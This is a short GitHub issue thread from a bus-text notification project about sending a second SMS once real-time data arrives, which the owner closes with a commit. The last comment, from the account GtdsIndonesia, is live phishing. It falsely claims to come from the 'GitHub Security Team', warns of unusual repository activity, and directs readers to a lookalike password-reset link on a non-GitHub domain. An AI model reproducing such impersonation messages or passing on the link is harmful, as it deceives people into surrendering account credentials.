### ISSUE TITLE
Send second text after 5 minutes if no real-time data was received

### ISSUE THREAD

**Issue by martellaj** [martellaj/bustxt#6]
- Send another text if the first request only had scheduled data and the second request has real-time data.

**Comment by martellaj** [comment]
Closed in 8bfd708e430c8c36546b4567a160918e5545a347.

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
